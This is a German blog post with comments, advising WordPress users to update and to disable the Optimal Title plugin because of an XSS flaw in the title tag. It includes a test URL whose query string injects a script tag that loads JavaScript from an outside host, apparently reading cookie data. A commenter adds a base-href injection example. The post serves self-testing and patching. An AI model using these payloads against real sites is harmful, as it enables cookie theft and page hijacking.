WordPress & Webwork

Updaten und auf Optimal-Title verzichten

Die neuen Versionen von WordPress (2.0.10. und 2.1.3) stopfen auch ein paar Sicherheitslücken. Jens hat mich vor ein paar Tagen auf eine Demo aufmerksam gemacht in dem man herausfinden kann ob ein Weblog bedroht ist oder nicht. Einfach an die Domain seines Weblogs folgendes in der Adressleiste dranhängen:

index.php?year=%22%3E%3C/title%3E%3Cscript%20src=
http://h4k.in/j.js%3E%3C/script%3E

und aufrufen. Da die Zeile zu lang ist musste ich sie umbrechen, eigentlich muss alles in eine Zeile. Wenn du dann anstatt deiner Website irgendetwas mit XSS und jede Menge komischer Daten siehst, dann hat dein Weblog eine Lücke. Bei den ausgelesenen Daten handelt sich meiner Meinung nach um die Daten aus dem Cookie.

Wie gesagt, die neuen Versionen stopfen die Lücke und schon seit einiger Zeit konnte man sich die gepatchten Dateien auch einzeln herunterladen. Mich hat es aber gewundert warum bei mir trotz des Patches die Lücke noch vorhanden war. Da die Lücke auf den title-Tag abzielt habe ich daher als erstes das Plugin "Optimal Title" deaktiviert und diese Lücke war nicht mehr vorhanden.

In wie fern es sich hier um eine kritische Sicherheitslücke handelt, dass kann ich nicht sagen. Wer aber auch ohne das o.g. Plugin die Seitentitel so ausgeben möchte das zuerst der Beitragstitel und dann der Name der Website auftaucht – gut für Lesezeichenverwaltung und für die Suchmaschinen – der schaue sich bitte den Beitrag Optimaler Seitentitel in WordPress und die Kommentare an.

5 Reaktion(en)

  1. Marcel Widmer

    Bei mir kommt ein "406 Not Acceptable"-Fehler. ❓

    Habe (als Laie) gegoogelt und interpretiere das so, dass mein Webhoster gewisse Dinge aus Sicherheitsgründen nicht zulässt. Ergo: mein Blog ist also nicht gefährdet.

    Sehe ich das so richtig? 🙄

  2. .mario

    Hi!

    In wie fern es sich hier um eine kritische Sicherheitslücke handelt, dass kann ich nicht sagen.

    Ich denke, die Lücke (und XSS im Allgemeinen) ist durchaus als kritisch zu betrachten, da der Angreifer die Möglichkeit erhält, über die Injection beliebiges HTML, JavaScript etc. in die Seite einzuschleusen – man möchte sich gar nicht ausdenken, was die Folgen sein können, wenn ein

    <base href="http:/bad.site.org" />

    injiziert wird…

    Die korrekte URL auf die JS Inclusion ist mittlwerweile btw i.js, nicht j.js – muss meinen Artikel mal updaten 😉

    LG

  3. Pingback: Live-Updates sind Stress pur / Schweinestall [.com]

Die Kommentare in diesem Beitrag sind geschlossen.